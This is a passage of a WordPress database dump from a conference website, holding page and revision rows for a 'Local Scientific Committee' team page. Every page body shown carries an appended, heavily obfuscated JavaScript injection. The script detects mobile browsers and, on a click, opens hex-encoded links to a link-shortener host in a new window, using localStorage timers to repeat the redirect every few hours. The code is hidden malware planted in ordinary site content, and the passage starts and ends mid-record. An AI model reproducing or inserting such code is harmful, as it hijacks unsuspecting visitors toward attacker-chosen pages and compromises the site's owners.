'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Local Scientific Committee','','publish','closed','closed','','local-scientific-committee','','','2023-03-28 14:22:29','2023-03-28 14:22:29','',0,'https://gsw2023.com/?page_id=3554',40,'page','',0),
(3555,1,'2023-01-14 19:14:22','2023-01-14 19:14:22','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55, 56, 57, 58, 59, 60, 61, 63, 64, 65, 62\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Local Science Committee','','inherit','closed','closed','','3554-revision-v1','','','2023-01-14 19:14:22','2023-01-14 19:14:22','',3554,'https://gsw2023.com/?p=3555',0,'revision','',0),
(3556,1,'2023-09-16 22:41:12','2023-01-14 19:15:30',' ','','','publish','closed','closed','','3556','','','2023-09-16 22:41:12','2023-09-16 22:41:12','',0,'https://gsw2023.com/index.php/2023/01/14/3556/',10,'nav_menu_item','',0),
(3557,1,'2023-01-14 19:15:29','2023-01-14 19:15:29','[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55, 56, 57, 58, 59, 60, 61, 63, 64, 65, 62\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const 